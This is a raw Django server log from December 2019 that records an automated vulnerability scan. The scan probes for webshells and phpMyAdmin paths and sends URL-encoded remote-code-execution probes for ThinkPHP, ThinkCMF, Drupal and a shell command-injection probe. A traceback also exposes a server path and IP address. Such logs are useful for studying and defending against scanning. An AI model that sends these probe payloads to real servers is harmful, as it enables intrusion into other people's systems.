/shell.php HTTP/1.0" 404 6447 Not Found: /scripts/setup.php [21/Dec/2019 06:53:26] "GET /scripts/setup.php HTTP/1.0" 404 6471 Not Found: /phpmyadmin/scripts/setup.php [21/Dec/2019 06:53:27] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /phpMyAdmin/scripts/setup.php [21/Dec/2019 06:53:29] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /scripts/db___.init.php [21/Dec/2019 06:53:31] "GET /scripts/db___.init.php HTTP/1.0" 404 6486 Not Found: /phpmyadmin/scripts/db___.init.php [21/Dec/2019 06:53:52] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6519 Not Found: /phpMyAdmin/scripts/db___.init.php [21/Dec/2019 06:53:52] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6519 Not Found: /pma/scripts/setup.php [21/Dec/2019 06:53:54] "GET /pma/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /PMA/scripts/setup.php [21/Dec/2019 06:53:55] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /myadmin/scripts/setup.php [21/Dec/2019 06:53:56] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /MyAdmin/scripts/setup.php [21/Dec/2019 06:53:57] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /pma/scripts/db___.init.php [21/Dec/2019 06:53:58] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /PMA/scripts/db___.init.php [21/Dec/2019 06:54:00] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /myadmin/scripts/db___.init.php [21/Dec/2019 06:54:02] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /MyAdmin/scripts/db___.init.php [21/Dec/2019 06:54:03] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /plugins/weathermap/editor.php [21/Dec/2019 06:54:03] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6507 Not Found: /cacti/plugins/weathermap/editor.php [21/Dec/2019 06:54:05] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6525 Not Found: /weathermap/editor.php [21/Dec/2019 06:54:16] "GET /weathermap/editor.php HTTP/1.0" 404 6483 Not Found: /index.php [21/Dec/2019 06:54:17] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6694 Not Found: /elrekt.php [21/Dec/2019 06:54:19] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6697 DEBUG 2019-12-21 06:54:19,696 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [21/Dec/2019 06:54:19] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [21/Dec/2019 06:54:22] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6598 [21/Dec/2019 06:54:26] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [21/Dec/2019 06:54:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 06:54:28,157 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [21/Dec/2019 06:54:28] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-21 06:54:28,783 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [21/Dec/2019 06:54:28] "GET /Joomla/ HTTP/1.0" 404 1728 [21/Dec/2019 06:54:30] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [21/Dec/2019 06:54:51] "GET /d7.php HTTP/1.0" 404 6438 Not Found: /rxr.php [21/Dec/2019 06:54:53] "GET /rxr.php HTTP/1.0" 404 6441 Not Found: /1x.php [21/Dec/2019 06:54:53] "GET /1x.php HTTP/1.0" 404 6438 Not Found: /home.php [21/Dec/2019 06:54:54] "GET /home.php HTTP/1.0" 404 6444 Not Found: /spider.php [21/Dec/2019 06:54:58] "GET /spider.php HTTP/1.0" 404 6450 Not Found: /payload.php [21/Dec/2019 06:54:59] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /composers.php [21/Dec/2019 06:54:59] "GET /composers.php HTTP/1.0" 404 6459 Not Found: /izom.php [21/Dec/2019 06:55:01] "GET /izom.php HTTP/1.0" 404 6444 Not Found: /composer.php [21/Dec/2019 06:55:02] "GET /composer.php HTTP/1.0" 404 6456 Not Found: /Drupal.php [21/Dec/2019 06:55:06] "GET /Drupal.php HTTP/1.0" 404 6450 Not Found: /lang.php [21/Dec/2019 06:55:09] "GET /lang.php?f=1 HTTP/1.0" 404 6448 Not Found: /payload.php [21/Dec/2019 06:55:14] "GET /payload.php HTTP/1.0" 404 6453 Not Found: /new_license.php [21/Dec/2019 06:55:15] "GET /new_license.php HTTP/1.0" 404 6465 Not Found: /images/!.php [21/Dec/2019 06:55:16] "GET /images/!.php HTTP/1.0" 404 6456 Not Found: /images/vuln.php [21/Dec/2019 06:55:18] "GET /images/vuln.php HTTP/1.0" 404 6465 Not Found: /hd.php [21/Dec/2019 06:55:19] "GET /hd.php HTTP/1.0" 404 6438 Not Found: /images/up.php [21/Dec/2019 06:55:19] "GET /images/up.php HTTP/1.0" 404 6459 Not Found: /images/attari.php [21/Dec/2019 06:55:20] "GET /images/attari.php HTTP/1.0" 404 6471 Not Found: /images/jsspwneed.php [21/Dec/2019 06:55:36] "GET /images/jsspwneed.php HTTP/1.0" 404 6480 Not Found: /images/stories/cmd.php [21/Dec/2019 06:55:40] "GET /images/stories/cmd.php HTTP/1.0" 404 6486 Not Found: /images/stories/filemga.php [21/Dec/2019 06:55:40] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6509 Not Found: /up.php [21/Dec/2019 06:55:41] "GET /up.php HTTP/1.0" 404 6438 Not Found: /laravel.php [21/Dec/2019 06:55:42] "GET /laravel.php HTTP/1.0" 404 6453 Not Found: /huoshan.php [21/Dec/2019 06:55:44] "GET /huoshan.php HTTP/1.0" 404 6453 Not Found: /yu.php [21/Dec/2019 06:55:45] "GET /yu.php HTTP/1.0" 404 6438 Not Found: /ftmabc.php [21/Dec/2019 06:55:48] "GET /ftmabc.php HTTP/1.0" 404 6450 Not Found: /doudou.php [21/Dec/2019 06:55:51] "GET /doudou.php HTTP/1.0" 404 6450 Not Found: /xiaoxia.php [21/Dec/2019 06:55:56] "GET /xiaoxia.php HTTP/1.0" 404 6453 Not Found: /yuyang.php [21/Dec/2019 06:55:58] "GET /yuyang.php HTTP/1.0" 404 6450 Not Found: /zz.php [21/Dec/2019 06:55:59] "GET /zz.php HTTP/1.0" 404 6438 Not Found: /coonig.php [21/Dec/2019 06:56:04] "GET /coonig.php HTTP/1.0" 404 6450 Not Found: /ak.php [21/Dec/2019 06:56:04] "GET /ak.php HTTP/1.0" 404 6438 Not Found: /hhhhhh.php [21/Dec/2019 06:56:10] "GET /hhhhhh.php HTTP/1.0" 404 6450 Not Found: /meijianxue.php [21/Dec/2019 06:56:10] "GET /meijianxue.php HTTP/1.0" 404 6462 Not Found: /no1.php [21/Dec/2019 06:56:11] "GET /no1.php HTTP/1.0" 404 6441 Not Found: /python.php [21/Dec/2019 06:56:13] "GET /python.php HTTP/1.0" 404 6450 Not Found: /woshimengmei.php [21/Dec/2019 06:56:14] "GET /woshimengmei.php HTTP/1.0" 404 6468 Not Found: /taisui.php [21/Dec/2019 06:56:19] "GET /taisui.php HTTP/1.0" 404 6450 Not Found: /xiaxia.php [21/Dec/2019 06:56:20] "GET /xiaxia.php HTTP/1.0" 404 6450 Not Found: /kk.php [21/Dec/2019 06:56:21] "GET /kk.php HTTP/1.0" 404 6438 Not Found: /xsser.php [21/Dec/2019 06:56:22] "GET /xsser.php HTTP/1.0" 404 6447 Not Found: /zzz.php [21/Dec/2019 06:56:23] "GET /zzz.php HTTP/1.0" 404 6441 Not Found: /dp.php [21/Dec/2019 06:56:28] "GET /dp.php HTTP/1.0" 404 6438 Not Found: /1ts.php [21/Dec/2019 06:56:32] "GET /1ts.php HTTP/1.0" 404 6441 Not Found: /phpdm.php [21/Dec/2019 06:56:37] "GET /phpdm.php HTTP/1.0" 404 6447 Not Found: /root.php [21/Dec/2019 06:56:39] "GET /root.php HTTP/1.0" 404 6444 [21/Dec/2019 06:56:45] "GET / HTTP/1.0" 302 0 Not Found: /root11.php [21/Dec/2019 06:56:46] "GET /root11.php HTTP/1.0" 404 6450 Not Found: /xiu.php [21/Dec/2019 06:56:53] "GET /xiu.php HTTP/1.0" 404 6441 Not Found: /wuwu11.php [21/Dec/2019 06:56:55] "POST /wuwu11.php HTTP/1.0" 404 6451 Not Found: /xw.php [21/Dec/2019 06:56:55] "POST /xw.php HTTP/1.0" 404 6439 Not Found: /xw1.php [21/Dec/2019 06:56:57] "POST /xw1.php HTTP/1.0" 404 6442 Not Found: /9678.php [21/Dec/2019 06:56:58] "POST /9678.php HTTP/1.0" 404 6445 Not Found: /wc.php [21/Dec/2019 06:56:59] "POST /wc.php HTTP/1.0" 404 6439 Not Found: /xx.php [21/Dec/2019 06:57:05] "POST /xx.php HTTP/1.0" 404 6439 Not Found: /s.php [21/Dec/2019 06:57:07] "POST /s.php HTTP/1.0" 404 6436 Not Found: /w.php [21/Dec/2019 06:57:09] "POST /w.php HTTP/1.0" 404 6436 Not Found: /sheep.php [21/Dec/2019 06:57:19] "POST /sheep.php HTTP/1.0" 404 6448 Not Found: /qaq.php [21/Dec/2019 06:57:22] "POST /qaq.php HTTP/1.0" 404 6442 Not Found: /my.php [21/Dec/2019 06:57:23] "POST /my.php HTTP/1.0" 404 6439 Not Found: /qq.php [21/Dec/2019 06:57:23] "POST /qq.php HTTP/1.0" 404 6439 Not Found: /aaa.php [21/Dec/2019 06:57:24] "POST /aaa.php HTTP/1.0" 404 6442 Not Found: /hhh.php [21/Dec/2019 06:57:25] "POST /hhh.php HTTP/1.0" 404 6442 Not Found: /jjj.php [21/Dec/2019 06:57:26] "POST /jjj.php HTTP/1.0" 404 6442 Not Found: /ffr.php [21/Dec/2019 06:57:35] "POST /ffr.php HTTP/1.0" 404 6442 Not Found: /411.php [21/Dec/2019 06:57:36] "POST /411.php HTTP/1.0" 404 6442 Not Found: /415.php [21/Dec/2019 06:57:38] "POST /415.php HTTP/1.0" 404 6442 Not Found: /421.php [21/Dec/2019 06:57:40] "POST /421.php HTTP/1.0" 404 6442 Not Found: /444.php [21/Dec/2019 06:57:40] "POST /444.php HTTP/1.0" 404 6442 Not Found: /a411.php [21/Dec/2019 06:57:41] "POST /a411.php HTTP/1.0" 404 6445 Not Found: /9.php [21/Dec/2019 06:57:50] "POST /9.php HTTP/1.0" 404 6436 Not Found: /98k.php [21/Dec/2019 06:57:57] "POST /98k.php HTTP/1.0" 404 6442 Not Found: /981.php [21/Dec/2019 06:57:58] "POST /981.php HTTP/1.0" 404 6442 Not Found: /888.php [21/Dec/2019 06:58:03] "POST /888.php HTTP/1.0" 404 6442 Not Found: /aa.php [21/Dec/2019 06:58:05] "POST /aa.php HTTP/1.0" 404 6439 Not Found: /bb.php [21/Dec/2019 06:58:06] "POST /bb.php HTTP/1.0" 404 6439 Not Found: /tt.php [21/Dec/2019 06:58:10] "POST /tt.php HTTP/1.0" 404 6439 Not Found: /bbq.php [21/Dec/2019 06:58:11] "POST /bbq.php HTTP/1.0" 404 6442 Not Found: /jj1.php [21/Dec/2019 06:58:15] "POST /jj1.php HTTP/1.0" 404 6442 Not Found: /7o.php [21/Dec/2019 06:58:19] "POST /7o.php HTTP/1.0" 404 6439 Not Found: /qwq.php [21/Dec/2019 06:58:21] "POST /qwq.php HTTP/1.0" 404 6442 Not Found: /nb.php [21/Dec/2019 06:58:22] "POST /nb.php HTTP/1.0" 404 6439 Not Found: /kpl.php [21/Dec/2019 06:58:23] "POST /kpl.php HTTP/1.0" 404 6442 Not Found: /hgx.php [21/Dec/2019 06:58:23] "POST /hgx.php HTTP/1.0" 404 6442 Not Found: /ppl.php [21/Dec/2019 06:58:26] "POST /ppl.php HTTP/1.0" 404 6442 Not Found: /tty.php [21/Dec/2019 06:58:27] "POST /tty.php HTTP/1.0" 404 6442 Not Found: /ooi.php [21/Dec/2019 06:58:28] "POST /ooi.php HTTP/1.0" 404 6442 Not Found: /aap.php [21/Dec/2019 06:58:28] "POST /aap.php HTTP/1.0" 404 6442 Not Found: /app.php [21/Dec/2019 06:58:30] "POST /app.php HTTP/1.0" 404 6442 Not Found: /ioi.php [21/Dec/2019 06:58:38] "POST /ioi.php HTTP/1.0" 404 6442 Not Found: /seeyon/htmlofficeservlet [21/Dec/2019 06:58:46] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6492 Not Found: /secure/ContactAdministrators!default.jspa [21/Dec/2019 06:58:47] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6543 Not Found: /weaver/bsh.servlet.BshServlet [21/Dec/2019 06:58:49] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6507 Not Found: /index.php [21/Dec/2019 06:58:53] "POST /index.php HTTP/1.0" 404 6448 Not Found: /user/register [21/Dec/2019 06:58:55] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6697 [21/Dec/2019 06:58:57] "GET / HTTP/1.0" 302 0 Not Found: /user.php [21/Dec/2019 06:58:57] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6445 Not Found: /index.php [21/Dec/2019 06:58:57] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [21/Dec/2019 06:58:58] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin/index.php [21/Dec/2019 06:59:00] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /pmd/index.php [21/Dec/2019 06:59:02] "GET /pmd/index.php HTTP/1.0" 404 6459 Not Found: /pma/index.php [21/Dec/2019 06:59:03] "GET /pma/index.php HTTP/1.0" 404 6459 Not Found: /PMA/index.php [21/Dec/2019 06:59:04] "GET /PMA/index.php HTTP/1.0" 404 6459 Not Found: /PMA2/index.php [21/Dec/2019 06:59:04] "GET /PMA2/index.php HTTP/1.0" 404 6462 Not Found: /pmamy/index.php [21/Dec/2019 06:59:05] "GET /pmamy/index.php HTTP/1.0" 404 6465 Not Found: /pmamy2/index.php [21/Dec/2019 06:59:08] "GET /pmamy2/index.php HTTP/1.0" 404 6468 Not Found: /mysql/index.php [21/Dec/2019 06:59:09] "GET /mysql/index.php HTTP/1.0" 404 6465 Not Found: /admin/index.php [21/Dec/2019 06:59:11] "GET /admin/index.php HTTP/1.0" 404 8892 Not Found: /db/index.php [21/Dec/2019 06:59:16] "GET /db/index.php HTTP/1.0" 404 6456 Not Found: /dbadmin/index.php [21/Dec/2019 06:59:16] "GET /dbadmin/index.php HTTP/1.0" 404 6471 Not Found: /web/phpMyAdmin/index.php [21/Dec/2019 06:59:17] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /admin/pma/index.php [21/Dec/2019 06:59:18] "GET /admin/pma/index.php HTTP/1.0" 404 8904 Not Found: /admin/PMA/index.php [21/Dec/2019 06:59:18] "GET /admin/PMA/index.php HTTP/1.0" 404 8904 Not Found: /admin/mysql/index.php [21/Dec/2019 06:59:19] "GET /admin/mysql/index.php HTTP/1.0" 404 8910 Not Found: /admin/mysql2/index.php [21/Dec/2019 06:59:21] "GET /admin/mysql2/index.php HTTP/1.0" 404 8913 Not Found: /admin/phpmyadmin/index.php [21/Dec/2019 06:59:31] "GET /admin/phpmyadmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpMyAdmin/index.php [21/Dec/2019 06:59:33] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 8925 Not Found: /admin/phpmyadmin2/index.php [21/Dec/2019 06:59:33] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 8928 Not Found: /mysqladmin/index.php [21/Dec/2019 06:59:34] "GET /mysqladmin/index.php HTTP/1.0" 404 6480 Not Found: /mysql-admin/index.php [21/Dec/2019 06:59:36] "GET /mysql-admin/index.php HTTP/1.0" 404 6483 Not Found: /phpadmin/index.php [21/Dec/2019 06:59:39] "GET /phpadmin/index.php HTTP/1.0" 404 6474 Not Found: /phpAdmin/index.php [21/Dec/2019 06:59:43] "GET /phpAdmin/index.php HTTP/1.0" 404 6474 Not Found: /phpmyadmin0/index.php [21/Dec/2019 06:59:43] "GET /phpmyadmin0/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin-4.4.0/index.php [21/Dec/2019 06:59:51] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6498 Not Found: /phpMyAdmin4.8.0/index.php [21/Dec/2019 06:59:52] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.2/index.php [21/Dec/2019 06:59:56] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.3/index.php [21/Dec/2019 06:59:57] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.4/index.php [21/Dec/2019 06:59:57] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6495 Not Found: /phpMyAdmin4.8.5/index.php [21/Dec/2019 06:59:58] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6495 Not Found: /myadmin/index.php [21/Dec/2019 06:59:58] "GET /myadmin/index.php HTTP/1.0" 404 6471 Not Found: /myadmin2/index.php [21/Dec/2019 06:59:59] "GET /myadmin2/index.php HTTP/1.0" 404 6474 Not Found: /xampp/phpmyadmin/index.php [21/Dec/2019 07:00:00] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6498 Not Found: /phpMyadmin_bak/index.php [21/Dec/2019 07:00:01] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6492 Not Found: /www/phpMyAdmin/index.php [21/Dec/2019 07:00:01] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /phpmyadmin-old/index.php [21/Dec/2019 07:00:05] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdminold/index.php [21/Dec/2019 07:00:06] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6489 Not Found: /phpMyAdmin.old/index.php [21/Dec/2019 07:00:10] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6492 Not Found: /pma-old/index.php [21/Dec/2019 07:00:11] "GET /pma-old/index.php HTTP/1.0" 404 6471 Not Found: /claroline/phpMyAdmin/index.php [21/Dec/2019 07:00:12] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6510 Not Found: /typo3/phpmyadmin/index.php [21/Dec/2019 07:00:15] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6498 Not Found: /phpma/index.php [21/Dec/2019 07:00:17] "GET /phpma/index.php HTTP/1.0" 404 6465 Not Found: /phpmyadmin/phpmyadmin/index.php [21/Dec/2019 07:00:18] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6513 Not Found: /phpMyAbmin/index.php [21/Dec/2019 07:00:21] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin__/index.php [21/Dec/2019 07:00:22] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6486 Not Found: /phpMyAdmin+++---/index.php [21/Dec/2019 07:00:23] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6498 Not Found: /v/index.php [21/Dec/2019 07:00:23] "GET /v/index.php HTTP/1.0" 404 6453 Not Found: /phpmyadm1n/index.php [21/Dec/2019 07:00:24] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdm1n/index.php [21/Dec/2019 07:00:25] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6480 Not Found: /shaAdmin/index.php [21/Dec/2019 07:00:26] "GET /shaAdmin/index.php HTTP/1.0" 404 6474 Not Found: /phpMyadmi/index.php [21/Dec/2019 07:00:29] "GET /phpMyadmi/index.php HTTP/1.0" 404 6477 Not Found: /phpMyAdmion/index.php [21/Dec/2019 07:00:30] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6483 Not Found: /s/index.php [21/Dec/2019 07:00:30] "GET /s/index.php HTTP/1.0" 404 6453 Not Found: /MyAdmin/index.php [21/Dec/2019 07:00:31] "GET /MyAdmin/index.php HTTP/1.0" 404 6471 Not Found: /phpMyAdmin123/index.php [21/Dec/2019 07:00:35] "GET /phpMyAdmin123/index.php HTTP/1.0" 404 6489 Not Found: /pwd/index.php [21/Dec/2019 07:00:37] "GET /pwd/index.php HTTP/1.0" 404 6459 Not Found: /phpMyAdmina/index.php [21/Dec/2019 07:00:37] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6483 Not Found: /phpMydmin/index.php [21/Dec/2019 07:00:38] "GET /phpMydmin/index.php HTTP/1.0" 404 6477 Not Found: /phpMyAdmins/index.php [21/Dec/2019 07:00:38] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdmin._/index.php [21/Dec/2019 07:00:40] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6486 Not Found: /phpMyAdmin._2/index.php [21/Dec/2019 07:00:42] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin2222/index.php [21/Dec/2019 07:00:44] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmin333/index.php [21/Dec/2019 07:00:45] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6489 Not Found: /phpmyadmin3333/index.php [21/Dec/2019 07:00:46] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6492 Not Found: /php2MyAdmin/index.php [21/Dec/2019 07:00:46] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6483 Not Found: /phpiMyAdmin/index.php [21/Dec/2019 07:00:47] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6483 Not Found: /phpNyAdmin/index.php [21/Dec/2019 07:00:48] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6480 Not Found: /1/index.php [21/Dec/2019 07:00:48] "GET /1/index.php HTTP/1.0" 404 6453 Not Found: /download/index.php [21/Dec/2019 07:00:49] "GET /download/index.php HTTP/1.0" 404 6474 Not Found: /phpMyAdmin_111/index.php [21/Dec/2019 07:00:56] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6492 Not Found: /phpmadmin/index.php [21/Dec/2019 07:00:57] "GET /phpmadmin/index.php HTTP/1.0" 404 6477 Not Found: /123131/index.php [21/Dec/2019 07:01:01] "GET /123131/index.php HTTP/1.0" 404 6468 Not Found: /phpMyAdminn/index.php [21/Dec/2019 07:01:03] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6483 Not Found: /phpMyAdminhf/index.php [21/Dec/2019 07:01:07] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6486 Not Found: /sbb/index.php [21/Dec/2019 07:01:08] "GET /sbb/index.php HTTP/1.0" 404 6459 Not Found: /WWW/phpMyAdmin/index.php [21/Dec/2019 07:01:08] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6492 Not Found: /phpMyAdmln/index.php [21/Dec/2019 07:01:15] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6480 Not Found: /phpMyAdmin_ai/index.php [21/Dec/2019 07:01:16] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6489 Not Found: /__phpMyAdmin/index.php [21/Dec/2019 07:01:17] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6486 Not Found: /program/index.php [21/Dec/2019 07:01:20] "GET /program/index.php HTTP/1.0" 404 6471 Not Found: /shopdb/index.php [21/Dec/2019 07:01:21] "GET /shopdb/index.php HTTP/1.0" 404 6468 Not Found: /phpmy/index.php [21/Dec/2019 07:01:25] "GET /phpmy/index.php HTTP/1.0" 404 6465 Not Found: /mysql/admin/index.php [21/Dec/2019 07:01:25] "GET /mysql/admin/index.php HTTP/1.0" 404 6483 Not Found: /mysql/sqlmanager/index.php [21/Dec/2019 07:01:29] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6498 Not Found: /mysql/mysqlmanager/index.php [21/Dec/2019 07:01:31] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6504 Not Found: /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php [21/Dec/2019 07:01:32] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.0" 404 6597 Not Found: /sqladmin/index.php [21/Dec/2019 07:01:33] "GET /sqladmin/index.php HTTP/1.0" 404 6474 Not Found: /SQL/index.php [21/Dec/2019 07:01:38] "GET /SQL/index.php HTTP/1.0" 404 6459 Not Found: /MySQLAdmin/index.php [21/Dec/2019 07:01:42] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6480 Not Found: /manager/html [21/Dec/2019 07:01:49] "GET /manager/html HTTP/1.0" 404 6456 [21/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:17:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:22:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:27:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:36:28] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:41:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:48:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:53:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 07:58:48] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:18:25] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:24:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [21/Dec/2019 08:24:25] "POST /editBlackAndWhiteList HTTP/1.0" 500 63902 [21/Dec/2019 08:29:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:34:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:39:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:45:27] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:50:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 08:55:54] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [21/Dec/2019 08:56:46] "GET /proxy.php HTTP/1.0" 404 6456 [21/Dec/2019 09:04:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:05:03] "GET / HTTP/1.0" 